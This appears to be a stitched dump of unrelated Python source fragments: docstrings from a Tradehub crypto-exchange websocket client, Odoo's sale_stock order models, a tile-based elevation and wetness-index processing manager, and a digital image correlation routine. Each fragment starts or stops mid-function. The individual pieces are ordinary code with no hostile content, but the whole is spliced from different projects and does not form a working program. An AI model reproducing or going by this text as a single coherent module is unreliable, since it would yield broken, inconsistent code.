['books.eth1_usdc1', ...] } The initial subscription message is expected as:: { 'channel': 'books.eth1_usdc1', 'sequence_number': 924, 'result': [ { 'market': 'eth1_usdc1', 'price': '1797.1', 'quantity': '0.02', 'side': 'sell', 'type': 'new' }, ... { 'market': 'eth1_usdc1', 'price': '1790.1', 'quantity': '0.02', 'side': 'buy', 'type': 'new' } ... ] } The channel update messages are expected as:: { 'channel': 'books.eth1_usdc1', 'sequence_number': 924, 'result': [ { 'market': 'eth1_usdc1', 'price': '1797.1', 'quantity': '0', 'side': 'sell', 'type': 'delete' }, ... { 'market':'eth1_usdc1', 'price': '1800.18', 'quantity': '-0.43', 'side': 'sell', 'type': 'update' }, ... { 'market': 'eth1_usdc1', 'price': '1114.48', 'quantity': '182.716', 'side': 'buy', 'type': 'new' } ] } .. note:: The initial message is a snapshot of the current orderbook. The following messages are delta messages to the snapshot. Each message has a 'sequence_number'. Updates can contain update types: 'new', 'update' or 'delete'. The quantity in a 'update' message can be negative indicating a reduction, while positive value means an increment. All updates need to be processed in the provided order to maintain an consistent orderbook. .. warning:: The initial snapshot is a partial orderbook with a total of 100 entries! Expect receiving updates for orders outside the local managed orderbook. Ignore or reconnect to maintain the local orderbook. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param market: Tradehub market identifier, e.g. 'swth_eth1' :return: None """ channel_name: str = f"books.{market}" await self.subscribe(message_id, [channel_name]) async def subscribe_orders(self, message_id: str, swth_address: str, market: Optional[str] = None): """ Subscribe to orders channel. .. note:: The market identifier is optional and acts as a filter. Example:: ws_client.subscribe_orders('orders', "swth1...abcd') The initial channel message is expected as:: { 'id':'orders', 'result': ['orders.swth1...abcd'] } The channel update messages are expected as:: { 'channel': 'orders.swth1...abcd', 'result': [ { 'order_id': '7CBBF51B75CF2E046726BB...56757D6D502B01F4BB62178DCF', 'block_height': 7375724, 'triggered_block_height': 0, 'address': 'swth1...abcd', 'market': 'eth1_wbtc1', 'side': 'sell', 'price': '0', 'quantity': '0.08', 'available': '0.08', 'filled': '0', 'order_status': 'pending', 'order_type': 'market', 'initiator': 'user', 'time_in_force': 'fok', 'stop_price': '0', 'trigger_type': '', 'allocated_margin_denom': 'eth1', 'allocated_margin_amount': '0', 'is_liquidation': False, 'is_post_only': False, 'is_reduce_only': False, 'type': 'new', 'block_created_at': '2021-02-11T20:36:02.244175356Z', 'username': '', 'id': '' } ... ] } :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param swth_address: Tradehub wallet address starting with 'swth1' for mainnet and 'tswth1' for testnet. :param market: Tradehub market identifier, e.g. 'swth_eth1' :return: None """ if market: channel_name: str = f"orders_by_market.{market}.{swth_address}" else: channel_name: str = f"orders.{swth_address}" await self.subscribe(message_id, [channel_name]) async def subscribe_positions(self, message_id: str, swth_address: str, market: Optional[str] = None): """ Subscribe to positions channel. .. note:: The market identifier is optional and acts as a filter. .. warning:: This channel is not tested yet. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param swth_address: Tradehub wallet address starting with 'swth1' for mainnet and 'tswth1' for testnet. :param market: Tradehub market identifier, e.g. 'swth_eth1' :return: None """ # TODO not tested yet if market: channel_name: str = f"positions_by_market.{market}.{swth_address}" else: channel_name: str = f"positions.{swth_address}" await self.subscribe(message_id, [channel_name]) async def subscribe_recent_trades(self, message_id: str, market: str): """ Subscribe to recent trades. Example:: ws_client.subscribe_recent_trades('trades', "swth_eth1') The initial channel message is expected as:: { 'id': 'trades', 'result': ['recent_trades.swth_eth1'] } The channel update messages are expected as:: { 'channel': 'recent_trades.eth1_usdc1', 'sequence_number': 812, 'result': [ { 'id': '0', 'block_created_at': '2021-02-11T20:49:07.095418551Z', 'taker_id': '5FF349410F9CF59BED36D412D1223424835342274BC0E504ED0A17EE4B5B0856', 'taker_address': 'swth1vaavrkrm7usqg9hcwhqh2hev9m3nryw7aera8p', 'taker_fee_amount': '0.00002', 'taker_fee_denom': 'eth1', 'taker_side': 'buy', 'maker_id': '8334A9C97CAEFAF84774AAADB0D5666E7764BA023DF145C8AF90BB6A6862EA2E', 'maker_address': 'swth1wmcj8gmz4tszy5v8c0d9lxnmguqcdkw22275w5', 'maker_fee_amount': '-0.00001', 'maker_fee_denom': 'eth1', 'maker_side': 'sell', 'market': 'eth1_usdc1', 'price': '1797.1', 'quantity': '0.02', 'liquidation': '', 'taker_username': '', 'maker_username': '', 'block_height': '7376096' }, ... ] } .. warning:: The field 'id' is sometimes '0'. This endpoint/channel does not seem to work correct. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param market: Tradehub market identifier, e.g. 'swth_eth1' :return: None """ channel_name: str = f"recent_trades.{market}" await self.subscribe(message_id, [channel_name]) async def subscribe_account_trades(self, message_id: str, swth_address: str, market: Optional[str] = None): """ Subscribe to account trades. Example:: ws_client.subscribe_account_trades('account', 'swth...abcd', 'eth1_usdc1') # or for all markets ws_client.subscribe_account_trades('account', "swth...abcd') The initial channel message is expected as:: { 'id': 'account', 'result': ['account_trades_by_market.eth1_usdc1.swth1...abcd'] } # or for all markets { 'id': 'account', 'result': ['account_trades.swth1...abcd'] } The channel update messages are expected as:: { 'channel': 'recent_trades.eth1_usdc1', 'sequence_number': 812, 'result': [ { 'id': '0', 'block_created_at': '2021-02-11T20:49:07.095418551Z', 'taker_id': '5FF349410F9CF59BED36D412D1223424835342274BC0E504ED0A17EE4B5B0856', 'taker_address': 'swth1...taker', 'taker_fee_amount': '0.00002', 'taker_fee_denom': 'eth1', 'taker_side': 'buy', 'maker_id': '8334A9C97CAEFAF84774AAADB0D5666E7764BA023DF145C8AF90BB6A6862EA2E', 'maker_address': 'swth1...maker', 'maker_fee_amount': '-0.00001', 'maker_fee_denom': 'eth1', 'maker_side': 'sell', 'market': 'eth1_usdc1', 'price': '1797.1', 'quantity': '0.02', 'liquidation': '', 'taker_username': '', 'maker_username': '', 'block_height': '7376096' }, ... ] } .. note:: The market identifier is optional and acts as a filter. .. warning:: The field 'id' is '0' all the time. This endpoint/channel does not seem to work correct. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param swth_address: Tradehub wallet address starting with 'swth1' for mainnet and 'tswth1' for testnet. :param market: Tradehub market identifier,
<gh_stars>0 # -*- coding: utf-8 -*- # Part of Odoo. See LICENSE file for full copyright and licensing details. import json import logging from datetime import datetime, timedelta from collections import defaultdict from odoo import api, fields, models, _ from odoo.tools import DEFAULT_SERVER_DATETIME_FORMAT, float_compare, float_round from odoo.tools.float_utils import float_repr from odoo.tools.misc import format_date from odoo.exceptions import UserError _logger = logging.getLogger(__name__) class SaleOrder(models.Model): _inherit = "sale.order" @api.model def _default_warehouse_id(self): # !!! Any change to the default value may have to be repercuted # on _init_column() below. return self.env.user._get_default_warehouse_id() incoterm = fields.Many2one( 'account.incoterms', 'Incoterm', help="International Commercial Terms are a series of predefined commercial terms used in international transactions.") picking_policy = fields.Selection([ ('direct', 'As soon as possible'), ('one', 'When all products are ready')], string='Shipping Policy', required=True, readonly=True, default='direct', states={'draft': [('readonly', False)], 'sent': [('readonly', False)]} ,help="If you deliver all products at once, the delivery order will be scheduled based on the greatest " "product lead time. Otherwise, it will be based on the shortest.") warehouse_id = fields.Many2one( 'stock.warehouse', string='Warehouse', required=True, readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}, default=_default_warehouse_id, check_company=True) picking_ids = fields.One2many('stock.picking', 'sale_id', string='Transfers') delivery_count = fields.Integer(string='Delivery Orders', compute='_compute_picking_ids') procurement_group_id = fields.Many2one('procurement.group', 'Procurement Group', copy=False) effective_date = fields.Date("Effective Date", compute='_compute_effective_date', store=True, help="Completion date of the first delivery order.") expected_date = fields.Datetime( help="Delivery date you can promise to the customer, computed from the minimum lead time of " "the order lines in case of Service products. In case of shipping, the shipping policy of " "the order will be taken into account to either use the minimum or maximum lead time of " "the order lines.") json_popover = fields.Char('JSON data for the popover widget', compute='_compute_json_popover') show_json_popover = fields.Boolean('Has late picking', compute='_compute_json_popover') def _init_column(self, column_name): """ Ensure the default warehouse_id is correctly assigned At column initialization, the ir.model.fields for res.users.property_warehouse_id isn't created, which means trying to read the property field to get the default value will crash. We therefore enforce the default here, without going through the default function on the warehouse_id field. """ if column_name != "warehouse_id": return super(SaleOrder, self)._init_column(column_name) field = self._fields[column_name] default = self.env['stock.warehouse'].search([('company_id', '=', self.env.company.id)], limit=1) value = field.convert_to_write(default, self) value = field.convert_to_column(value, self) if value is not None: _logger.debug("Table '%s': setting default value of new column %s to %r", self._table, column_name, value) query = 'UPDATE "%s" SET "%s"=%s WHERE "%s" IS NULL' % ( self._table, column_name, field.column_format, column_name) self._cr.execute(query, (value,)) @api.depends('picking_ids.date_done') def _compute_effective_date(self): for order in self: pickings = order.picking_ids.filtered(lambda x: x.state == 'done' and x.location_dest_id.usage == 'customer') dates_list = [date for date in pickings.mapped('date_done') if date] order.effective_date = min(dates_list).date() if dates_list else False @api.depends('picking_policy') def _compute_expected_date(self): super(SaleOrder, self)._compute_expected_date() for order in self: dates_list = [] for line in order.order_line.filtered(lambda x: x.state != 'cancel' and not x._is_delivery() and not x.display_type): dt = line._expected_date() dates_list.append(dt) if dates_list: expected_date = min(dates_list) if order.picking_policy == 'direct' else max(dates_list) order.expected_date = fields.Datetime.to_string(expected_date) @api.model def create(self, vals): if 'warehouse_id' not in vals and 'company_id' in vals: user = self.env['res.users'].browse(vals.get('user_id', False)) vals['warehouse_id'] = user.with_company(vals.get('company_id'))._get_default_warehouse_id().id return super().create(vals) def write(self, values): if values.get('order_line') and self.state == 'sale': for order in self: pre_order_line_qty = {order_line: order_line.product_uom_qty for order_line in order.mapped('order_line') if not order_line.is_expense} if values.get('partner_shipping_id'): new_partner = self.env['res.partner'].browse(values.get('partner_shipping_id')) for record in self: picking = record.mapped('picking_ids').filtered(lambda x: x.state not in ('done', 'cancel')) addresses = (record.partner_shipping_id.display_name, new_partner.display_name) message = _("""The delivery address has been changed on the Sales Order<br/> From <strong>"%s"</strong> To <strong>"%s"</strong>, You should probably update the partner on this document.""") % addresses picking.activity_schedule('mail.mail_activity_data_warning', note=message, user_id=self.env.user.id) if values.get('commitment_date'): # protagate commitment_date as the deadline of the related stock move. # TODO: Log a note on each down document self.order_line.move_ids.date_deadline = fields.Datetime.to_datetime(values.get('commitment_date')) res = super(SaleOrder, self).write(values) if values.get('order_line') and self.state == 'sale': for order in self: to_log = {} for order_line in order.order_line: if float_compare(order_line.product_uom_qty, pre_order_line_qty.get(order_line, 0.0), order_line.product_uom.rounding) < 0: to_log[order_line] = (order_line.product_uom_qty, pre_order_line_qty.get(order_line, 0.0)) if to_log: documents = self.env['stock.picking']._log_activity_get_documents(to_log, 'move_ids', 'UP') documents = {k:v for k, v in documents.items() if k[0].state != 'cancel'} order._log_decrease_ordered_quantity(documents) return res def _compute_json_popover(self): for order in self: late_stock_picking = order.picking_ids.filtered(lambda p: p.delay_alert_date) order.json_popover = json.dumps({ 'popoverTemplate': 'sale_stock.DelayAlertWidget', 'late_elements': [{ 'id': late_move.id, 'name': late_move.display_name, 'model': 'stock.picking', } for late_move in late_stock_picking ] }) order.show_json_popover = bool(late_stock_picking) def _action_confirm(self): self.order_line._action_launch_stock_rule() return super(SaleOrder, self)._action_confirm() @api.depends('picking_ids') def _compute_picking_ids(self): for order in self: order.delivery_count = len(order.picking_ids) @api.onchange('company_id') def _onchange_company_id(self): if self.company_id: warehouse_id = self.env['ir.default'].get_model_defaults('sale.order').get('warehouse_id') self.warehouse_id = warehouse_id or self.user_id.with_company(self.company_id.id)._get_default_warehouse_id().id @api.onchange('user_id') def onchange_user_id(self): super().onchange_user_id() self.warehouse_id = self.user_id.with_company(self.company_id.id)._get_default_warehouse_id().id @api.onchange('partner_shipping_id') def _onchange_partner_shipping_id(self): res = {} pickings = self.picking_ids.filtered( lambda p: p.state not in ['done', 'cancel'] and p.partner_id != self.partner_shipping_id ) if pickings: res['warning'] = { 'title': _('Warning!'), 'message': _( 'Do not forget to change the partner on the following delivery orders: %s' ) % (','.join(pickings.mapped('name'))) } return res def action_view_delivery(self): ''' This function returns an action that display existing delivery orders of given sales order ids. It can either be a in a list or in a form view, if there is only one delivery order to show. ''' action = self.env["ir.actions.actions"]._for_xml_id("stock.action_picking_tree_all") pickings = self.mapped('picking_ids') if len(pickings) > 1: action['domain'] = [('id', 'in', pickings.ids)] elif pickings: form_view = [(self.env.ref('stock.view_picking_form').id, 'form')] if 'views' in action: action['views'] = form_view + [(state,view) for state,view in action['views'] if view != 'form'] else: action['views'] = form_view action['res_id'] = pickings.id # Prepare the context. picking_id = pickings.filtered(lambda l: l.picking_type_id.code == 'outgoing') if picking_id: picking_id = picking_id[0] else: picking_id = pickings[0] action['context'] = dict(self._context, default_partner_id=self.partner_id.id, default_picking_type_id=picking_id.picking_type_id.id, default_origin=self.name, default_group_id=picking_id.group_id.id) return action def action_cancel(self): documents = None for sale_order in self: if sale_order.state == 'sale' and sale_order.order_line: sale_order_lines_quantities = {order_line: (order_line.product_uom_qty, 0) for order_line in sale_order.order_line} documents = self.env['stock.picking']._log_activity_get_documents(sale_order_lines_quantities, 'move_ids', 'UP') self.picking_ids.filtered(lambda p: p.state != 'done').action_cancel() if documents: filtered_documents = {} for (parent, responsible), rendering_context in documents.items(): if parent._name == 'stock.picking': if parent.state == 'cancel': continue filtered_documents[(parent, responsible)] = rendering_context self._log_decrease_ordered_quantity(filtered_documents, cancel=True) return super(SaleOrder, self).action_cancel() def _prepare_invoice(self): invoice_vals = super(SaleOrder, self)._prepare_invoice() invoice_vals['invoice_incoterm_id'] = self.incoterm.id return invoice_vals @api.model def _get_customer_lead(self, product_tmpl_id): super(SaleOrder, self)._get_customer_lead(product_tmpl_id) return product_tmpl_id.sale_delay def _log_decrease_ordered_quantity(self, documents, cancel=False): def _render_note_exception_quantity_so(rendering_context): order_exceptions, visited_moves = rendering_context visited_moves = list(visited_moves) visited_moves = self.env[visited_moves[0]._name].concat(*visited_moves) order_line_ids = self.env['sale.order.line'].browse([order_line.id for order in order_exceptions.values() for order_line in order[0]]) sale_order_ids = order_line_ids.mapped('order_id') impacted_pickings = visited_moves.filtered(lambda m: m.state not in ('done', 'cancel')).mapped('picking_id') values = { 'sale_order_ids': sale_order_ids, 'order_exceptions': order_exceptions.values(), 'impacted_pickings': impacted_pickings, 'cancel': cancel } return self.env.ref('sale_stock.exception_on_so')._render(values=values) self.env['stock.picking']._log_activity(_render_note_exception_quantity_so, documents) def _show_cancel_wizard(self): res = super(SaleOrder, self)._show_cancel_wizard() for order in self: if any(picking.state == 'done' for picking in order.picking_ids) and not order._context.get('disable_cancel_warning'): return True return res class SaleOrderLine(models.Model): _inherit = 'sale.order.line' qty_delivered_method = fields.Selection(selection_add=[('stock_move', 'Stock Moves')]) product_packaging = fields.Many2one( 'product.packaging', string='Package', default=False, check_company=True) route_id = fields.Many2one('stock.location.route', string='Route', domain=[('sale_selectable', '=', True)], ondelete='restrict', check_company=True) move_ids = fields.One2many('stock.move', 'sale_line_id', string='Stock Moves') product_type = fields.Selection(related='product_id.type') virtual_available_at_date = fields.Float(compute='_compute_qty_at_date', digits='Product Unit of Measure') scheduled_date = fields.Datetime(compute='_compute_qty_at_date') forecast_expected_date = fields.Datetime(compute='_compute_qty_at_date') free_qty_today = fields.Float(compute='_compute_qty_at_date', digits='Product Unit of Measure') qty_available_today = fields.Float(compute='_compute_qty_at_date') warehouse_id = fields.Many2one(related='order_id.warehouse_id') qty_to_deliver = fields.Float(compute='_compute_qty_to_deliver', digits='Product Unit of Measure') is_mto = fields.Boolean(compute='_compute_is_mto') display_qty_widget = fields.Boolean(compute='_compute_qty_to_deliver') @api.depends('product_type', 'product_uom_qty', 'qty_delivered', 'state', 'move_ids', 'product_uom') def _compute_qty_to_deliver(self): """Compute the visibility of the inventory widget.""" for line in self: line.qty_to_deliver = line.product_uom_qty - line.qty_delivered if line.state in ('draft', 'sent', 'sale') and line.product_type == 'product' and line.product_uom and line.qty_to_deliver > 0: if line.state == 'sale' and not line.move_ids: line.display_qty_widget = False else: line.display_qty_widget = True else: line.display_qty_widget = False @api.depends( 'product_id', 'customer_lead', 'product_uom_qty', 'product_uom', 'order_id.commitment_date', 'move_ids', 'move_ids.forecast_expected_date', 'move_ids.forecast_availability') def _compute_qty_at_date(self): """ Compute the quantity forecasted of product at delivery date. There are two cases: 1. The quotation has a commitment_date, we take it as delivery date 2. The quotation hasn't commitment_date, we compute the estimated delivery date based on lead time""" treated = self.browse() # If the state is already in sale the picking is created and a simple forecasted quantity isn't enough # Then used the forecasted data of the related stock.move for line in self.filtered(lambda l: l.state == 'sale'): if not line.display_qty_widget: continue moves = line.move_ids.filtered(lambda m: m.product_id == line.product_id) line.forecast_expected_date = max(moves.filtered("forecast_expected_date").mapped("forecast_expected_date"), default=False) line.qty_available_today = 0 line.free_qty_today = 0 for move in moves: line.qty_available_today += move.product_uom._compute_quantity(move.reserved_availability, line.product_uom)
{'left': EdgeFile(fn, [slice(None), slice(0, 1)], save_path), 'right': EdgeFile(fn, [slice(None), slice(-1, None)], save_path), 'top': EdgeFile(fn, [slice(0, 1), slice(None)], save_path), 'bottom': EdgeFile(fn, [slice(-1, None), slice(None)], save_path)} for fn in list(self.neighbors.keys())} self.edges = edges return edges def fill_max_elevations(self): max_elev = {} for fn in list(self.edges.keys()): elev_file = GdalReader(file_name=fn) elev, = elev_file.raster_layers max_elev[fn] = np.nanmax(elev.raster_data) del elev_file # close file del elev self.max_elev = max_elev def fill_percent_done(self): percent_done = {} for key, edge in self.edges.items(): for key1, ed in edge.items(): ed.update_metrics() # ed.load_metrics() percent_done[key] = np.array([edge[key2].percent_done for key2 in list(edge.keys())]) percent_done[key] = percent_done[key].sum() \ / ((percent_done[key] > 0).sum() + 1e-16) self.percent_done = percent_done def visualize_neighbors(self, neighbors=None): if neighbors is None: neighbors = self.neighbors import matplotlib.pyplot as plt coords = np.array([parse_fn(key) for key in list(neighbors.keys())]) n_coords = [np.array([parse_fn(neighbors[key][side]) for key in list(neighbors.keys())]) for side in ['left', 'right', 'top', 'bottom', 'top-right', 'top-left', 'bottom-right', 'bottom-left']] top = 2 bot = 0 left = 1 right = 3 x = (coords[:, left] + coords[:, right]) / 2.0 y = (coords[:, top] + coords[:, bot]) / 2.0 n_x = [(n_coord[:, left] + n_coord[:, right]) / 2.0 - x for n_coord in n_coords] n_y = [(n_coord[:, top] + n_coord[:, bot]) / 2.0 - y for n_coord in n_coords] self.fill_percent_done() colors = np.array([self.percent_done[key] for key in list(neighbors.keys())]) plt.scatter(x, y, c=colors, s=400, cmap='CMRmap_r') plt.clim(0, 100) plt.colorbar() for coord in coords: plt.plot([coord[left], coord[right], coord[right], coord[left], coord[left]], [coord[top], coord[top], coord[bot], coord[bot], coord[top]]) for nx, ny in zip(n_x, n_y): plt.quiver(x, y, nx, ny, angles='xy', scale_units='xy', scale=1, width=0.005) plt.xlim(coords[:, left].min(), coords[:, right].max()) plt.ylim(coords[:, bot].min(), coords[:, top].max()) count = 0 for key, edge in self.edges.items(): for side in ['left', 'right', 'top', 'bottom']: ed = edge[side] coordinates = ed.get_coordinates() todo = ed.get('todo') done = ed.get('done') data = (ed.get('data') > 0) y, x = coordinates.T if side in ['left', 'top']: plt.plot(x[todo & done & data], y[todo & done & data], 'bo', mec='b', mfc='none', mew=1, label='could do (left/top)') plt.plot(x[todo & ~done], y[todo & ~done], 'xr', label='not done, could not do (left/top)') plt.plot(x[~todo & done], y[~todo & done], '<g', mec='g', label='done (left/top)') else: plt.plot(x[todo & done & data], y[todo & done & data], 'bs', mec='b', mfc='none', mew=1, label='could do (right/bot)') plt.plot(x[todo & ~done], y[todo & ~done], '+r', label='not done, could not do (right/bot)') plt.plot(x[~todo & done], y[~todo & done], '>g', mec='g', label='done (right/bot)') if count == 0: plt.plot(x[0], y[0], 'bs', mec='b', mfc='none', mew=1, label='could do (right/bot)') plt.plot(x[0], y[0], '+r', label='not done, could not do (right/bot)') plt.plot(x[0], y[0], '>g', mec='g', label='done (right/bot)') plt.legend(loc=0) count += 1 # clean up del coordinates del todo del done del data def build_interpolator(self, dem_proc): # Build an interpolator gc = dem_proc.elev.grid_coordinates # points = np.meshgrid(gc.x_axis, gc.y_axis) # points = np.column_stack([pts.ravel() for pts in points]) # interp = spinterp.NearestNDInterpolator(points, dem_proc.data.ravel()) # interp = spinterp.LinearNDInterpolator(points, np.ravel(dem_proc.data), # fill_value=np.nan) interp = spinterp.interpolate.RegularGridInterpolator( points=(gc.y_axis[::-1], gc.x_axis), values=dem_proc.data[::-1, :].astype(float), method='nearest', fill_value=np.nan, bounds_error=False) return interp def set_neighbor_data(self, elev_fn, dem_proc, interp=None): """ From the elevation filename, we can figure out and load the data and done arrays. """ if interp is None: interp = self.build_interpolator(dem_proc) opp = {'top': 'bottom', 'left': 'right'} for key in list(self.neighbors[elev_fn].keys()): tile = self.neighbors[elev_fn][key] if tile == '': continue oppkey = key for me, neigh in opp.items(): if me in key: oppkey = oppkey.replace(me, neigh) else: oppkey = oppkey.replace(neigh, me) opp_edge = self.neighbors[tile][oppkey] if opp_edge == '': continue interp.values = dem_proc.uca[::-1, :] # interp.values[:, 0] = np.ravel(dem_proc.uca) # for other interp. # for the top-left tile we have to set the bottom and right edges # of that tile, so two edges for those tiles for key_ed in oppkey.split('-'): self.edges[tile][key_ed].set_data('data', interp) interp.values = dem_proc.edge_done[::-1, :].astype(float) # interp.values[:, 0] = np.ravel(dem_proc.edge_done) for key_ed in oppkey.split('-'): self.edges[tile][key_ed].set_data('done', interp) def update_edge_todo(self, elev_fn, dem_proc): """ Can figure out how to update the todo based on the elev filename """ for key in list(self.edges[elev_fn].keys()): self.edges[elev_fn][key].set_data('todo', data=dem_proc.edge_todo) def update_edges(self, elev_fn, dem_proc): """ After finishing a calculation, this will update the neighbors and the todo for that tile """ interp = self.build_interpolator(dem_proc) self.update_edge_todo(elev_fn, dem_proc) self.set_neighbor_data(elev_fn, dem_proc, interp) def get_edge_init_data(self, fn, save_path=None): """ Creates the initialization data from the edge structure """ edge_init_data = {key: self.edges[fn][key].get('data') for key in list(self.edges[fn].keys())} edge_init_done = {key: self.edges[fn][key].get('done') for key in list(self.edges[fn].keys())} edge_init_todo = {key: self.edges[fn][key].get('todo') for key in list(self.edges[fn].keys())} return edge_init_data, edge_init_done, edge_init_todo def find_best_candidate(self, elev_source_files=None): """ Heuristically determines which tile should be recalculated based on updated edge information. Presently does not check if that tile is locked, which could lead to a parallel thread closing while one thread continues to process tiles. """ self.fill_percent_done() i_b = np.argmax(list(self.percent_done.values())) if list(self.percent_done.values())[i_b] <= 0: return None # check for ties I = np.array(list(self.percent_done.values())) == \ list(self.percent_done.values())[i_b] if I.sum() == 1: pass # no ties else: I2 = np.argmax(np.array(list(self.max_elev.values()))[I]) i_b = I.nonzero()[0][I2] # Make sure the apples are still apples assert(np.array(list(self.max_elev.keys()))[I][I2] == np.array(list(self.percent_done.keys()))[I][I2]) if elev_source_files is not None: fn = list(self.percent_done.keys())[i_b] lckfn = _get_lockfile_name(fn) if os.path.exists(lckfn): # another process is working on it # Find a different Candidate i_alt = np.argsort(list(self.percent_done.values()))[::-1] for i in i_alt: fn = list(self.percent_done.keys())[i] lckfn = _get_lockfile_name(fn) if not os.path.exists(lckfn): break # Get and return the index i_b = elev_source_files.index(fn) return i_b class ProcessManager(object): """ This assumes that the elevation has already been processed. That is, pits have been removed. """ twi_status = [] elev_source_files = [] _INPUT_FILE_TYPES = ["tif", "tiff", "vrt", "hgt", 'flt', 'adf', 'grib', 'grib2', 'grb', 'gr1'] tile_edge = None _DEBUG = False def __init__(self, source_path='.', save_path='processed_data', clean_tmp=True, use_cache=True, overwrite_cache=False): """ Processes elevation data inputs, and saves conditioned elevation and the topographic wetness index. Parameters ----------- source_path: list/str (optional) Default: current directory. Directory/location of elevation files. save_path: str (optional) Location where processed files will be saved. Default value is a sub-directory to the source file path called 'processed_data'. clean_tmp: bool (optional) Default: True. When True, some temporary files and directories are removed after calculation. If False, these are not removed. use_cache: bool (optional) Default: True. When True, this function looks in the expected temporary file location and uses any intermediate files already present overwrite_cache: bool (optional) Default: False. If this file already exists, it is not overwritten, and no calculation is made. If True, any exisiting file will be replaced """ self.source_path = source_path self.save_path = save_path self.overwrite_cache = overwrite_cache self.clean_tmp = clean_tmp self.elev_source_files = [os.path.join(source_path, fn) for fn in os.listdir(source_path) if os.path.splitext(fn)[-1].replace('.', '') in self._INPUT_FILE_TYPES] self.twi_status = ["Unknown" for sf in self.elev_source_files] self.custom_status = ["Unknown" for sf in self.elev_source_files] if not os.path.isdir(save_path): os.makedirs(save_path) subdirs = ['ang', 'mag', 'uca', 'twi', 'uca_edge_corrected', 'edge'] for subdir in subdirs: if not os.path.isdir(os.path.join(save_path, subdir)): os.makedirs(os.path.join(save_path, subdir)) def process_twi(self, index=None, do_edges=False, skip_uca_twi=False): """ Processes the TWI, along with any dependencies (like the slope and UCA) Parameters ----------- index : int/slice (optional) Default: None - process all tiles in source directory. Otherwise, will only process the index/indices of the files as listed in self.elev_source_files do_edges : bool (optional) Default False. When false, the UCA will be calculated with available edge information if the UCA was not previously computed. If the UCA was previously computed and do_edges == False, the UCA will not be updated. If do_edges == True, the UCA will also be recalculated. skip_uca_twi : bool (optional) Skips the calculation of the UCA and TWI (only calculates the magnitude and direction) Notes ------ do_edges = False for the first round of the processing, but it is True for the second round. """ if index is not None: elev_source_files = [self.elev_source_files[index]] else: elev_source_files = self.elev_source_files for i, esfile in enumerate(elev_source_files): try: fn, status = self.calculate_twi(esfile, save_path=self.save_path, do_edges=do_edges, skip_uca_twi=skip_uca_twi) if index is None: self.twi_status[i] = status else: self.twi_status[index] = status except: lckfn = _get_lockfile_name(esfile) try: os.remove(lckfn) except: pass traceback.print_exc() print(traceback.format_exc()) if index is None: self.twi_status[i] = "Error " + traceback.format_exc() else: self.twi_status[index] = "Error " + traceback.format_exc() def process(self, index=None): """ This will completely process a directory of elevation tiles (as supplied in the constructor). Both phases of the calculation, the single tile
from __future__ import absolute_import import logging from copy import copy import numpy as np import scipy.ndimage as nd from .reference import generate_reference from .reference_q4 import generate_reference_Q4, find_elm_borders_mesh, normalized_zero_mean from ..IO.image_stack import ImageStack from ..elements.b_splines import BSplineSurface from ..elements.q4 import Q4 from ..mesh.meshUtilities import Mesh from ..utils import convert_to_img_frame, find_element_borders def correlate_img_to_ref_spline(node_pos, img, ref, settings): """ Correlate an image to a reference The routine identifies the part of the image covered by the mesh and tries to perform image correlation on this part of the image. Parameters ---------- node_pos : ndarray The position of the nodes mesh : Mesh The mesh object img : ndarray 2d array containing the image ref : Reference The reference object settings : DICInput The settings which will be used during the analysis Returns ------- updated node positions, current pixel values NOTES ------- The function extracts a rectangular region of the image covered by the element, which may be very large if the mesh is tilted. This would reduce the performance of the routine """ element_borders = find_element_borders(node_pos, settings.mesh) image_frame, node_pos_img_coords = convert_to_img_frame(img, node_pos, settings.mesh, element_borders, settings) node_position_increment, Ic, conv = correlate_frames(node_pos_img_coords, settings.mesh, image_frame, ref, settings) node_position_new = node_pos + node_position_increment return node_position_new, Ic, conv def correlate_frames(node_pos, mesh, img, ref, settings): """ Parameters ---------- node_pos : ndarray The position of the nodes mesh : Mesh The mesh object img : ndarray 2d array containing the image frame ref : Reference The reference object settings : DICInput The settings which will be used during the analysis Returns ------- updated node positions, current pixel values """ logger = logging.getLogger(__name__) node_pos = np.copy(node_pos).astype(settings.precision) # Declare empty arrays pixel_pos = np.zeros((2, ref.n_pixels), dtype=settings.precision) dnod_x = np.zeros(mesh.n_nodes * 2) image_filtered = nd.spline_filter(img, order=settings.interpolation_order).transpose() for it in range(settings.maxit): # Find nodal positions within ROI np.dot(node_pos, ref.Nref_stack, out=pixel_pos) # Find pixel values for current coordinates Ic = nd.map_coordinates(image_filtered, pixel_pos, order=settings.interpolation_order, prefilter=False) # Calculate position increment as (B^T B)^-1 * (B^T*dIk) "Least squares solution" dnod = np.dot(ref.K, ref.I0_stack - Ic) # Add increment to nodal positions node_pos[0, :] += dnod[:mesh.n_nodes] node_pos[1, :] += dnod[mesh.n_nodes:] dnod_x += dnod # Check for convergence if np.max(np.abs(dnod)) < settings.tol: logger.info('Frame converged in %s iterations', it) return np.array((dnod_x[:mesh.n_nodes], dnod_x[mesh.n_nodes:])), Ic, True # Reset array values logger.info("Frame did not converge. Largest increment was %f pixels" % np.max(dnod)) return np.array((dnod_x[:mesh.n_nodes], dnod_x[mesh.n_nodes:])), Ic, False def store_stripped_copy(reference_generator, storage): """ Store a stripped copy of the reference object The stored reference object is stripped from all resource intensive variables Parameters ---------- reference_generator : func The reference generator function storage : list The list where the stripped references are appended Returns ------- reference_generator """ def wrapper(*args, **kwargs): ref = reference_generator(*args, **kwargs) ref_light = copy(ref) # Remove the heavy fields ref_light.Nref_stack = None ref_light.B_stack = None ref_light.K = None storage.append(ref_light) return ref return wrapper def correlate(inputs, correlator, reference_gen): """ Main correlation routine This routine manages result storage, reference generation and the necessary logic for handling convergence issues. Parameters ---------- inputs : DIC_input object The input object containing all necessary data for performing a DIC analysis. Returns ------- node_coords, reference_stack, Ic_stacks """ logger = logging.getLogger(__name__) mesh = inputs.mesh images = inputs.images settings = inputs # Do the initial setup images.image_reader.precision = settings.precision Ic_stacks = list() reference_stack = list() node_position_t = list() if settings.store_internals: gen_ref = store_stripped_copy(reference_gen, storage=reference_stack) else: gen_ref = reference_gen if settings.node_hist: node_coords = np.array(settings.node_hist, dtype=settings.precision)[:, :, 0] else: node_coords = np.array((mesh.xnodes, mesh.ynodes), 